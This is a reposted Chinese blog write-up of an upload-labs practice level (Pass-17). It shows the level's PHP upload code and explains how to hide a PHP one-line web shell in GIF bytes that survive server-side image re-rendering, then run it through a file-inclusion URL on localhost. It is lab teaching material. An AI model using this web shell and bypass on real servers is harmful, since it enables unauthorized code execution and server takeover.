读者可参考、订阅专栏:Upload-Labs靶场攻防实战
Antsword蚁剑
蚁剑工具的使用可参考:
[网络安全]AntSword(蚁剑)实战解题详析(入门)
[网络安全]DVWA之File Upload—AntSword(蚁剑)攻击姿势及解题详析合集
姿势
后端逻辑代码:
<?phpinclude'../config.php';include'../head.php';include'../menu.php';$is_upload=false;$msg=null;if(isset($_POST['submit'])){// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径$filename=$_FILES['upload_file']['name'];$filetype=$_FILES['upload_file']['type'];$tmpname=$_FILES['upload_file']['tmp_name'];$target_path=UPLOAD_PATH.'/'.basename($filename);// 获得上传文件的扩展名$fileext=substr(strrchr($filename,"."),1);//判断文件后缀与类型,合法才进行上传操作if(($fileext=="jpg")&&($filetype=="image/jpeg")){if(move_uploaded_file($tmpname,$target_path)){//使用上传的图片生成新的图片$im=imagecreatefromjpeg($target_path);if($im==false){$msg="该文件不是jpg格式的图片!";
@unlink($target_path);}else{//给新图片指定文件名srand(time());$newfilename=strval(rand()).".jpg";//显示二次渲染后的图片(使用用户上传图片生成的新图片)$img_path=UPLOAD_PATH.'/'.$newfilename;imagejpeg($im,$img_path);
@unlink($target_path);$is_upload=true;}}else{$msg="上传出错!";}}elseif(($fileext=="png")&&($filetype=="image/png")){if(move_uploaded_file($tmpname,$target_path)){//使用上传的图片生成新的图片$im=imagecreatefrompng($target_path);if($im==false){$msg="该文件不是png格式的图片!";
@unlink($target_path);}else{//给新图片指定文件名srand(time());$newfilename=strval(rand()).".png";//显示二次渲染后的图片(使用用户上传图片生成的新图片)$img_path=UPLOAD_PATH.'/'.$newfilename;imagepng($im,$img_path);
@unlink($target_path);$is_upload=true;}}else{$msg="上传出错!";}}elseif(($fileext=="gif")&&($filetype=="image/gif")){if(move_uploaded_file($tmpname,$target_path)){//使用上传的图片生成新的图片$im=imagecreatefromgif($target_path);if($im==false){$msg="该文件不是gif格式的图片!";
@unlink($target_path);}else{//给新图片指定文件名srand(time());$newfilename=strval(rand()).".gif";//显示二次渲染后的图片(使用用户上传图片生成的新图片)$img_path=UPLOAD_PATH.'/'.$newfilename;imagegif($im,$img_path);
@unlink($target_path);$is_upload=true;}}else{$msg="上传出错!";}}else{$msg="只允许上传后缀为.jpg|.png|.gif的图片文件!";}}?><div id="upload_panel"><ol><li><h3>任务</h3><p>上传<code>图片马</code>到服务器。</p><p>注意:</p><p>1.保证上传后的图片马中仍然包含完整的<code>一句话</code>或<code>webshell</code>代码。</p><p>2.使用<a href="<?php echo INC_VUL_PATH;?>" target="_bank">文件包含漏洞</a>能运行图片马中的恶意代码。</p><p>3.图片马要<code>.jpg</code>,<code>.png</code>,<code>.gif</code>三种后缀都上传成功才算过关!</p></li><li><h3>上传区</h3><form enctype="multipart/form-data" method="post"><p>请选择要上传的图片:<p><input class="input_file" type="file" name="upload_file"/><input class="button" type="submit" name="submit" value="上传"/></form><div id="msg"><?php
if($msg!=null){echo"提示:".$msg;}?></div><div id="img"><?php
if($is_upload){echo'<img src="'.$img_path.'" width="250px" />';}?></div></li><?php
if($_GET['action']=="show_code"){include'show_code.php';}?></ol></div><?php
include'../footer.php';?>
imagecreatefrompng是PHP中的一个函数,用于创建一个新的图像资源对象,并从PNG格式的图像文件中读取数据
由于二次渲染后图片中的部分数据会被修改,即(A,B,C)可能会被修改为(A,D,E),那么对于此限制,我们可以找到不被修改的
A
,因为它不被过滤,因此我们将A修改为注入语句,此时语句不会被过滤,从而达到命令执行的目的。
我们先下载一个gif图像,使用Hxd编辑器可得到其图像数据:
HxD Hex Editor 工具的安装使用链接:HxD工具使用说明详细教程 | CSDN@秋说
接着上传该gif,得到二次渲染后的图像:
接着将该图像另存为8479.gif,使用Hxd编辑器查看:
可以看到自00000190后,数据被二次渲染,也就是说在该行之前的数据是不会被渲染的。
于是我们插入一句话木马:
<?php @eval($_REQUEST[1]);?>
保存修改:
接着重新上传该gif:
找到该文件路径:
由于靶场存在文件包含漏洞,于是我们可以利用文件包含实命令执行:
POC:
http://localhost/upload-labs-master/include.php?file=upload/11078.gif&1=phpinfo();
命令执行成功:
总结
以上为[网络安全]upload-labs Pass-17 解题详析,后续将分享[网络安全]xss-labs Pass-18 解题详析。
我是秋说,我们下次见。
本文转载自: https://blog.csdn.net/2301_77485708/article/details/132367733
版权归原作者 秋说 所有, 如有侵权,请联系我们删除。
版权归原作者 秋说 所有, 如有侵权,请联系我们删除。